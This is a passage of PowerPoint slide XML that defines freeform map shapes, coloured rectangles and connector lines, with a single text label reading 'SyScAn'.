                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="111"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35894" name="Freeform 428"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1819" y="2848"/>
                <a:ext cx="66" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 66"/>
                  <a:gd name="T1" fmla="*/ 66 h 68"/>
                  <a:gd name="T2" fmla="*/ 21 w 66"/>
                  <a:gd name="T3" fmla="*/ 64 h 68"/>
                  <a:gd name="T4" fmla="*/ 18 w 66"/>
                  <a:gd name="T5" fmla="*/ 60 h 68"/>
                  <a:gd name="T6" fmla="*/ 15 w 66"/>
                  <a:gd name="T7" fmla="*/ 52 h 68"/>
                  <a:gd name="T8" fmla="*/ 13 w 66"/>
                  <a:gd name="T9" fmla="*/ 46 h 68"/>
                  <a:gd name="T10" fmla="*/ 12 w 66"/>
                  <a:gd name="T11" fmla="*/ 44 h 68"/>
                  <a:gd name="T12" fmla="*/ 8 w 66"/>
                  <a:gd name="T13" fmla="*/ 44 h 68"/>
                  <a:gd name="T14" fmla="*/ 4 w 66"/>
                  <a:gd name="T15" fmla="*/ 39 h 68"/>
                  <a:gd name="T16" fmla="*/ 0 w 66"/>
                  <a:gd name="T17" fmla="*/ 33 h 68"/>
                  <a:gd name="T18" fmla="*/ 2 w 66"/>
                  <a:gd name="T19" fmla="*/ 28 h 68"/>
                  <a:gd name="T20" fmla="*/ 3 w 66"/>
                  <a:gd name="T21" fmla="*/ 24 h 68"/>
                  <a:gd name="T22" fmla="*/ 2 w 66"/>
                  <a:gd name="T23" fmla="*/ 19 h 68"/>
                  <a:gd name="T24" fmla="*/ 3 w 66"/>
                  <a:gd name="T25" fmla="*/ 18 h 68"/>
                  <a:gd name="T26" fmla="*/ 12 w 66"/>
                  <a:gd name="T27" fmla="*/ 17 h 68"/>
                  <a:gd name="T28" fmla="*/ 13 w 66"/>
                  <a:gd name="T29" fmla="*/ 15 h 68"/>
                  <a:gd name="T30" fmla="*/ 13 w 66"/>
                  <a:gd name="T31" fmla="*/ 9 h 68"/>
                  <a:gd name="T32" fmla="*/ 14 w 66"/>
                  <a:gd name="T33" fmla="*/ 5 h 68"/>
                  <a:gd name="T34" fmla="*/ 15 w 66"/>
                  <a:gd name="T35" fmla="*/ 3 h 68"/>
                  <a:gd name="T36" fmla="*/ 17 w 66"/>
                  <a:gd name="T37" fmla="*/ 1 h 68"/>
                  <a:gd name="T38" fmla="*/ 20 w 66"/>
                  <a:gd name="T39" fmla="*/ 0 h 68"/>
                  <a:gd name="T40" fmla="*/ 30 w 66"/>
                  <a:gd name="T41" fmla="*/ 4 h 68"/>
                  <a:gd name="T42" fmla="*/ 33 w 66"/>
                  <a:gd name="T43" fmla="*/ 4 h 68"/>
                  <a:gd name="T44" fmla="*/ 33 w 66"/>
                  <a:gd name="T45" fmla="*/ 1 h 68"/>
                  <a:gd name="T46" fmla="*/ 34 w 66"/>
                  <a:gd name="T47" fmla="*/ 0 h 68"/>
                  <a:gd name="T48" fmla="*/ 37 w 66"/>
                  <a:gd name="T49" fmla="*/ 1 h 68"/>
                  <a:gd name="T50" fmla="*/ 43 w 66"/>
                  <a:gd name="T51" fmla="*/ 1 h 68"/>
                  <a:gd name="T52" fmla="*/ 49 w 66"/>
                  <a:gd name="T53" fmla="*/ 0 h 68"/>
                  <a:gd name="T54" fmla="*/ 54 w 66"/>
                  <a:gd name="T55" fmla="*/ 1 h 68"/>
                  <a:gd name="T56" fmla="*/ 59 w 66"/>
                  <a:gd name="T57" fmla="*/ 2 h 68"/>
                  <a:gd name="T58" fmla="*/ 66 w 66"/>
                  <a:gd name="T59" fmla="*/ 5 h 68"/>
                  <a:gd name="T60" fmla="*/ 61 w 66"/>
                  <a:gd name="T61" fmla="*/ 12 h 68"/>
                  <a:gd name="T62" fmla="*/ 58 w 66"/>
                  <a:gd name="T63" fmla="*/ 17 h 68"/>
                  <a:gd name="T64" fmla="*/ 57 w 66"/>
                  <a:gd name="T65" fmla="*/ 21 h 68"/>
                  <a:gd name="T66" fmla="*/ 58 w 66"/>
                  <a:gd name="T67" fmla="*/ 24 h 68"/>
                  <a:gd name="T68" fmla="*/ 59 w 66"/>
                  <a:gd name="T69" fmla="*/ 28 h 68"/>
                  <a:gd name="T70" fmla="*/ 60 w 66"/>
                  <a:gd name="T71" fmla="*/ 33 h 68"/>
                  <a:gd name="T72" fmla="*/ 63 w 66"/>
                  <a:gd name="T73" fmla="*/ 39 h 68"/>
                  <a:gd name="T74" fmla="*/ 63 w 66"/>
                  <a:gd name="T75" fmla="*/ 42 h 68"/>
                  <a:gd name="T76" fmla="*/ 60 w 66"/>
                  <a:gd name="T77" fmla="*/ 53 h 68"/>
                  <a:gd name="T78" fmla="*/ 57 w 66"/>
                  <a:gd name="T79" fmla="*/ 60 h 68"/>
                  <a:gd name="T80" fmla="*/ 49 w 66"/>
                  <a:gd name="T81" fmla="*/ 56 h 68"/>
                  <a:gd name="T82" fmla="*/ 47 w 66"/>
                  <a:gd name="T83" fmla="*/ 56 h 68"/>
                  <a:gd name="T84" fmla="*/ 43 w 66"/>
                  <a:gd name="T85" fmla="*/ 59 h 68"/>
                  <a:gd name="T86" fmla="*/ 41 w 66"/>
                  <a:gd name="T87" fmla="*/ 59 h 68"/>
                  <a:gd name="T88" fmla="*/ 38 w 66"/>
                  <a:gd name="T89" fmla="*/ 58 h 68"/>
                  <a:gd name="T90" fmla="*/ 33 w 66"/>
                  <a:gd name="T91" fmla="*/ 58 h 68"/>
                  <a:gd name="T92" fmla="*/ 32 w 66"/>
                  <a:gd name="T93" fmla="*/ 59 h 68"/>
                  <a:gd name="T94" fmla="*/ 30 w 66"/>
                  <a:gd name="T95" fmla="*/ 61 h 68"/>
                  <a:gd name="T96" fmla="*/ 35 w 66"/>
                  <a:gd name="T97" fmla="*/ 68 h 68"/>
                  <a:gd name="T98" fmla="*/ 31 w 66"/>
                  <a:gd name="T99" fmla="*/ 68 h 68"/>
                  <a:gd name="T100" fmla="*/ 23 w 66"/>
                  <a:gd name="T101" fmla="*/ 66 h 68"/>
                  <a:gd name="T102" fmla="*/ 20 w 66"/>
                  <a:gd name="T103" fmla="*/ 66 h 68"/>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66"/>
                  <a:gd name="T157" fmla="*/ 0 h 68"/>
                  <a:gd name="T158" fmla="*/ 66 w 66"/>
                  <a:gd name="T159" fmla="*/ 68 h 68"/>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66" h="68">
                    <a:moveTo>
                      <a:pt x="20" y="66"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="66"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35895" name="Freeform 429"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1819" y="2848"/>
                <a:ext cx="66" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 66"/>
                  <a:gd name="T1" fmla="*/ 66 h 68"/>
                  <a:gd name="T2" fmla="*/ 21 w 66"/>
                  <a:gd name="T3" fmla="*/ 64 h 68"/>
                  <a:gd name="T4" fmla="*/ 18 w 66"/>
                  <a:gd name="T5" fmla="*/ 60 h 68"/>
                  <a:gd name="T6" fmla="*/ 15 w 66"/>
                  <a:gd name="T7" fmla="*/ 52 h 68"/>
                  <a:gd name="T8" fmla="*/ 13 w 66"/>
                  <a:gd name="T9" fmla="*/ 46 h 68"/>
                  <a:gd name="T10" fmla="*/ 12 w 66"/>
                  <a:gd name="T11" fmla="*/ 44 h 68"/>
                  <a:gd name="T12" fmla="*/ 8 w 66"/>
                  <a:gd name="T13" fmla="*/ 44 h 68"/>
                  <a:gd name="T14" fmla="*/ 4 w 66"/>
                  <a:gd name="T15" fmla="*/ 39 h 68"/>
                  <a:gd name="T16" fmla="*/ 0 w 66"/>
                  <a:gd name="T17" fmla="*/ 33 h 68"/>
                  <a:gd name="T18" fmla="*/ 2 w 66"/>
                  <a:gd name="T19" fmla="*/ 28 h 68"/>
                  <a:gd name="T20" fmla="*/ 3 w 66"/>
                  <a:gd name="T21" fmla="*/ 24 h 68"/>
                  <a:gd name="T22" fmla="*/ 2 w 66"/>
                  <a:gd name="T23" fmla="*/ 19 h 68"/>
                  <a:gd name="T24" fmla="*/ 3 w 66"/>
                  <a:gd name="T25" fmla="*/ 18 h 68"/>
                  <a:gd name="T26" fmla="*/ 12 w 66"/>
                  <a:gd name="T27" fmla="*/ 17 h 68"/>
                  <a:gd name="T28" fmla="*/ 13 w 66"/>
                  <a:gd name="T29" fmla="*/ 15 h 68"/>
                  <a:gd name="T30" fmla="*/ 13 w 66"/>
                  <a:gd name="T31" fmla="*/ 9 h 68"/>
                  <a:gd name="T32" fmla="*/ 14 w 66"/>
                  <a:gd name="T33" fmla="*/ 5 h 68"/>
                  <a:gd name="T34" fmla="*/ 15 w 66"/>
                  <a:gd name="T35" fmla="*/ 3 h 68"/>
                  <a:gd name="T36" fmla="*/ 17 w 66"/>
                  <a:gd name="T37" fmla="*/ 1 h 68"/>
                  <a:gd name="T38" fmla="*/ 20 w 66"/>
                  <a:gd name="T39" fmla="*/ 0 h 68"/>
                  <a:gd name="T40" fmla="*/ 30 w 66"/>
                  <a:gd name="T41" fmla="*/ 4 h 68"/>
                  <a:gd name="T42" fmla="*/ 33 w 66"/>
                  <a:gd name="T43" fmla="*/ 4 h 68"/>
                  <a:gd name="T44" fmla="*/ 33 w 66"/>
                  <a:gd name="T45" fmla="*/ 1 h 68"/>
                  <a:gd name="T46" fmla="*/ 34 w 66"/>
                  <a:gd name="T47" fmla="*/ 0 h 68"/>
                  <a:gd name="T48" fmla="*/ 37 w 66"/>
                  <a:gd name="T49" fmla="*/ 1 h 68"/>
                  <a:gd name="T50" fmla="*/ 43 w 66"/>
                  <a:gd name="T51" fmla="*/ 1 h 68"/>
                  <a:gd name="T52" fmla="*/ 49 w 66"/>
                  <a:gd name="T53" fmla="*/ 0 h 68"/>
                  <a:gd name="T54" fmla="*/ 54 w 66"/>
                  <a:gd name="T55" fmla="*/ 1 h 68"/>
                  <a:gd name="T56" fmla="*/ 59 w 66"/>
                  <a:gd name="T57" fmla="*/ 2 h 68"/>
                  <a:gd name="T58" fmla="*/ 66 w 66"/>
                  <a:gd name="T59" fmla="*/ 5 h 68"/>
                  <a:gd name="T60" fmla="*/ 61 w 66"/>
                  <a:gd name="T61" fmla="*/ 12 h 68"/>
                  <a:gd name="T62" fmla="*/ 58 w 66"/>
                  <a:gd name="T63" fmla="*/ 17 h 68"/>
                  <a:gd name="T64" fmla="*/ 57 w 66"/>
                  <a:gd name="T65" fmla="*/ 21 h 68"/>
                  <a:gd name="T66" fmla="*/ 58 w 66"/>
                  <a:gd name="T67" fmla="*/ 24 h 68"/>
                  <a:gd name="T68" fmla="*/ 59 w 66"/>
                  <a:gd name="T69" fmla="*/ 28 h 68"/>
                  <a:gd name="T70" fmla="*/ 60 w 66"/>
                  <a:gd name="T71" fmla="*/ 33 h 68"/>
                  <a:gd name="T72" fmla="*/ 63 w 66"/>
                  <a:gd name="T73" fmla="*/ 39 h 68"/>
                  <a:gd name="T74" fmla="*/ 63 w 66"/>
                  <a:gd name="T75" fmla="*/ 42 h 68"/>
                  <a:gd name="T76" fmla="*/ 60 w 66"/>
                  <a:gd name="T77" fmla="*/ 53 h 68"/>
                  <a:gd name="T78" fmla="*/ 57 w 66"/>
                  <a:gd name="T79" fmla="*/ 60 h 68"/>
                  <a:gd name="T80" fmla="*/ 49 w 66"/>
                  <a:gd name="T81" fmla="*/ 56 h 68"/>
                  <a:gd name="T82" fmla="*/ 47 w 66"/>
                  <a:gd name="T83" fmla="*/ 56 h 68"/>
                  <a:gd name="T84" fmla="*/ 43 w 66"/>
                  <a:gd name="T85" fmla="*/ 59 h 68"/>
                  <a:gd name="T86" fmla="*/ 41 w 66"/>
                  <a:gd name="T87" fmla="*/ 59 h 68"/>
                  <a:gd name="T88" fmla="*/ 38 w 66"/>
                  <a:gd name="T89" fmla="*/ 58 h 68"/>
                  <a:gd name="T90" fmla="*/ 33 w 66"/>
                  <a:gd name="T91" fmla="*/ 58 h 68"/>
                  <a:gd name="T92" fmla="*/ 32 w 66"/>
                  <a:gd name="T93" fmla="*/ 59 h 68"/>
                  <a:gd name="T94" fmla="*/ 30 w 66"/>
                  <a:gd name="T95" fmla="*/ 61 h 68"/>
                  <a:gd name="T96" fmla="*/ 35 w 66"/>
                  <a:gd name="T97" fmla="*/ 68 h 68"/>
                  <a:gd name="T98" fmla="*/ 31 w 66"/>
                  <a:gd name="T99" fmla="*/ 68 h 68"/>
                  <a:gd name="T100" fmla="*/ 23 w 66"/>
                  <a:gd name="T101" fmla="*/ 66 h 68"/>
                  <a:gd name="T102" fmla="*/ 20 w 66"/>
                  <a:gd name="T103" fmla="*/ 66 h 68"/>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66"/>
                  <a:gd name="T157" fmla="*/ 0 h 68"/>
                  <a:gd name="T158" fmla="*/ 66 w 66"/>
                  <a:gd name="T159" fmla="*/ 68 h 68"/>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66" h="68">
                    <a:moveTo>
                      <a:pt x="20" y="66"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="66"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35896" name="Rectangle 430"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4161" y="3634"/>
                <a:ext cx="343" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35897" name="Rectangle 431"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4161" y="3634"/>
                <a:ext cx="343" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35898" name="Line 432"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4333" y="2920"/>
                <a:ext cx="52" cy="714"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35899" name="Rectangle 433"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4232" y="3642"/>
                <a:ext cx="257" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>SyScAn</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35900" name="Rectangle 434"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4056" y="3483"/>
                <a:ext cx="351" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35901" name="Rectangle 435"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4056" y="3483"/>
                <a:ext cx="351" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35902" name="Line 436"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4231" y="2918"/>
                <a:ext cx="154" cy="565"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
